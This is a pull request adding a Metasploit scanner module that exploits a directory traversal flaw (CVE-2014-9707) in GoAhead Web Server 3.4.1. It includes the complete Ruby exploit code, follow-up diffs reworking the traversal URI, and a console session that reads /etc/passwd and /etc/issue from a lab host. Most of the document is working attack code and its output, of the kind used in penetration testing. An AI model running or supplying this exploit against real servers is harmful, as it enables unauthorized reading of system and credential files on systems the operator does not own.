### PR TITLE
Add Directory Traversal for GoAhead Web Server

### DIFF
--- a/modules/auxiliary/scanner/http/goahead_traversal.rb
+++ b/modules/auxiliary/scanner/http/goahead_traversal.rb
@@ -1,0 +1,77 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+                      'Name'           => 'GoAhead Embedded Web Server Directory Traversal',
+      'Description'    => %q{
+        This module exploits a directory traversal vulnerability in the EmbedThis GoAhead Web Server v3.4.1,
+        allowing to read arbitrary files with the web server privileges.
+      },
+      'References'     =>
+        [
+          ['CVE', '2014-9707'],
+          ['URL', 'http://packetstormsecurity.com/files/131156/GoAhead-3.4.1-Heap-Overflow-Traversal.html']
+        ],
+      'Author'         =>
+        [
+          'Matthew Daley', # Vulnerability discovery
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('FILEPATH', [true, "The path to the file to read", "/etc/passwd"]),
+        OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 5 ])
+      ], self.class)
+
+    deregister_options('RHOST')
+  end
+
+  def run_host(ip)
+    traversal = "../" * datastore['DEPTH']
+    segments = ".x/" * datastore['DEPTH']
+    filename = datastore['FILEPATH']
+    filename = filename[1, filename.length] if filename =~ /^\//
+
+    res = send_request_raw({
+      'method' => 'GET',
+      'uri'    => "#{traversal}#{segments}#{filename}"
+    })
+
+    if res &&
+        res.code == 200 &&
+        res.headers['Server'] &&
+        res.headers['Server'] =~ /GoAhead/
+
+      print_line("#{res.body}")
+
+      fname = datastore['FILEPATH']
+
+      path = store_loot(
+        'goahead.traversal',
+        'text/plain',
+        ip,
+        res,
+        fname
+      )
+
+      print_good("#{peer} - File saved in: #{path}")
+    else
+      print_error("#{peer} - Nothing was downloaded")
+    end
+  end
+end

--- a/modules/auxiliary/scanner/http/goahead_traversal.rb
+++ b/modules/auxiliary/scanner/http/goahead_traversal.rb
@@ -42,13 +42,13 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def run_host(ip)
-    traversal = "../" * datastore['DEPTH'] << ".x/" * datastore['DEPTH']
     filename = datastore['FILEPATH']
     filename = filename[1, filename.length] if filename =~ /^\//
+    traversal = "../" * datastore['DEPTH'] << ".x/" * datastore['DEPTH'] << filename
 
     res = send_request_raw({
       'method' => 'GET',
-      'uri'    => "#{traversal}#{filename}"
+      'uri'    => "#{traversal}"
     })
 
     if res &&

--- a/modules/auxiliary/scanner/http/goahead_traversal.rb
+++ b/modules/auxiliary/scanner/http/goahead_traversal.rb
@@ -42,14 +42,13 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def run_host(ip)
-    traversal = "../" * datastore['DEPTH']
-    segments = ".x/" * datastore['DEPTH']
+    traversal = "../" * datastore['DEPTH'] << ".x/" * datastore['DEPTH']
     filename = datastore['FILEPATH']
     filename = filename[1, filename.length] if filename =~ /^\//
 
     res = send_request_raw({
       'method' => 'GET',
-      'uri'    => "#{traversal}#{segments}#{filename}"
+      'uri'    => "#{traversal}#{filename}"
     })
 
     if res &&


### PR DESCRIPTION
#### Module to read file via directory traversal in GoAhead Web Server.

  Application: GoAhead Embedded Web Server v3.4.1
  Homepage: http://embedthis.com/goahead/index.html
  Source Code: https://github.com/embedthis/goahead
#### Vulnerable packages*

  3.0.0 - 3.4.1 (3.x.x series before 3.4.2) 
#### Usage:
##### Linux (Ubuntu 12.04.5):

```
msf > use auxiliary/scanner/http/goahead_traversal 
msf auxiliary(goahead_traversal) > show options 

Module options (auxiliary/scanner/http/goahead_traversal):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DEPTH     5                yes       Traversal Depth (to reach the root folder)
   FILEPATH  /etc/passwd      yes       The path to the file to read
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target address range or CIDR identifier
   RPORT     80               yes       The target port
   THREADS   1                yes       The number of concurrent threads
   VHOST                      no        HTTP server virtual host

msf auxiliary(goahead_traversal) > info

       Name: GoAhead Embedded Web Server Directory Traversal
     Module: auxiliary/scanner/http/goahead_traversal
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Matthew Daley
  Roberto Soares Espreto <robertoespreto@gmail.com>

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  DEPTH     5                yes       Traversal Depth (to reach the root folder)
  FILEPATH  /etc/passwd      yes       The path to the file to read
  Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                     yes       The target address range or CIDR identifier
  RPORT     80               yes       The target port
  THREADS   1                yes       The number of concurrent threads
  VHOST                      no        HTTP server virtual host

Description:
  This module exploits a directory traversal vulnerability in the 
  EmbedThis GoAhead Web Server v3.4.1, allowing to read arbitrary 
  files with the web server privileges.

References:
  http://cvedetails.com/cve/2014-9707/
  http://packetstormsecurity.com/files/131156/GoAhead-3.4.1-Heap-Overflow-Traversal.html

msf auxiliary(goahead_traversal) > set RHOSTS 192.168.1.46
RHOSTS => 192.168.1.46
msf auxiliary(goahead_traversal) > run

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
colord:x:103:108:colord colour management daemon,,,:/var/lib/colord:/bin/false
lightdm:x:104:111:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:105:114::/nonexistent:/bin/false
avahi-autoipd:x:106:117:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:107:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
usbmux:x:108:46:usbmux daemon,,,:/home/usbmux:/bin/false
kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:110:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:111:122:RealtimeKit,,,:/proc:/bin/false
speech-dispatcher:x:112:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
saned:x:114:123::/home/saned:/bin/false
espreto:x:1000:1000:espreto,,,:/home/espreto:/bin/bash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
postgres:x:115:125:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:116:126:MySQL Server,,,:/nonexistent:/bin/false

[+] 192.168.1.46:80 - File saved in: /home/espreto/.msf4/loot/20150407194735_default_192.168.1.46_goahead.traversa_206479.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(goahead_traversal) > set FILEPATH /etc/issue
FILEPATH => /etc/issue
msf auxiliary(goahead_traversal) > run

Ubuntu 12.04.5 LTS \n \l


[+] 192.168.1.46:80 - File saved in: /home/espreto/.msf4/loot/20150407194743_default_192.168.1.46_goahead.traversa_164437.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(goahead_traversal) >
```
##### Windows (Version 8):

Not tested yet.
